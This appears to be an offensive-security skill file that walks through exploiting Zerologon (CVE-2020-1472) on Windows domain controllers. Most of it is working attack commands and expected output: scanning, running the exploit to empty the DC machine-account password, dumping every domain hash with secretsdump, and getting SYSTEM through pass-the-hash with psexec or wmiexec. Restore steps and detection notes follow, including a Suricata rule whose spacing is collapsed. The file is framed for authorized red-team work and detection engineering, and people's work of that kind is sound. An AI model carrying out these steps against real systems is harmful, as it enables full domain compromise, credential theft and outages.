Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.
Instrucciones de origen · Vista previa de solo lectura
name
exploiting-zerologon-vulnerability-cve-2020-1472
description
Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.
Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session and reset the DC machine account password to empty, achieving full domain compromise. Microsoft patched this vulnerability in August 2020 (KB4571694).
When to Use
When performing authorized security testing that involves exploiting zerologon vulnerability cve 2020 1472
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding
Most Often Missed & How to Confirm
Not capturing the original machine password before zeroing it. The exploit empties the DC's machine account password and breaks AD replication — you MUST record the original hex secret (from the secretsdump) so you can restore it. Skipping this is the cardinal noPac/Zerologon sin.
Forgetting to restore at all. Leaving the DC$ password empty is an outage and a glaring IOC. Restore via restorepassword.py, netdom resetpwd, or a DC reboot.
Targeting an enforcement-mode DC. Post-Feb-2021 DCs with FullSecureChannelProtection=1 reject the all-zero auth — the ~256 attempts will never succeed.
Using the wrong DC NetBIOS name (must be the DC$ computer name, e.g. DC01$, not the FQDN).
How to confirm a hit: the tester reports the auth succeeding within ~256 attempts and NetrServerPasswordSet2 returns success; the definitive signal is secretsdump.py -no-pass corp.local/DC01$@<ip> returning the Administrator:500: and krbtgt:502: hashes, then a PtH wmiexec.py -hashes :<admin-nt> ... lands SYSTEM on the DC. Don't conclude the DC is patched until the all-zero authentication has actually been attempted and rejected; and never close the test until the machine account password is restored and replication confirmed healthy (repadmin /showrepl).
Prerequisites
Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
No authentication required (unauthenticated exploit)
Target DC must not have the February 2021 enforcement mode enabled
Impacket toolkit installed
Written authorization for red team engagement
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
MITRE ATT&CK Mapping
Technique ID
Name
Tactic
T1068
Exploitation for Privilege Escalation
Privilege Escalation
T1210
Exploitation of Remote Services
Lateral Movement
T1003.006
OS Credential Dumping: DCSync
Credential Access
T1078.002
Valid Accounts: Domain Accounts
Persistence
Vulnerability Technical Details
Root Cause
The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:
The IV is hardcoded to 16 bytes of zeros
When the plaintext is 8 bytes of zeros, AES-CFB8 produces a ciphertext of all zeros with probability 1 in 256
An attacker can send approximately 256 authentication attempts (takes ~3 seconds) to succeed
Affected Systems
Windows Server 2008 R2 through Windows Server 2019
All domain controllers running unpatched Netlogon service
Samba versions < 4.8 (if running as AD DC)
Step 1: Identify Vulnerable Domain Controllers
# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24
# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1
# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon
Step 2: Exploit Zerologon
# Using Impacket's CVE-2020-1472 exploit# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1
# Expected output:# Performing authentication attempts...# =========================================# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)# NetrServerPasswordSet2 call was successful# DC01$ machine account password set to empty string
Step 3: DCSync with Empty Password
# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1
# Output includes all domain hashes:# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
-just-dc-user Administrator
Step 4: Obtain Domain Admin Access
# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1
# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1
WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.
# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
-hexpass <original_hex_password>
# Method 2: Force machine account password change from DC# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*
# Method 3: Restart the DC (it will auto-regenerate machine password)# This is the safest method but causes downtime
Detection
Windows Event Logs
Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period
Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt
Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IP
Network Detection
# Suricata rule for Zerologonalertdcerpcanyany->anyany(msg:"ETEXPLOITPossibleZerologonNetrServerReqChallenge";flow:established,to_server;dce_opnum:4;content:"|0000000000000000|";sid:2030870;rev:1;)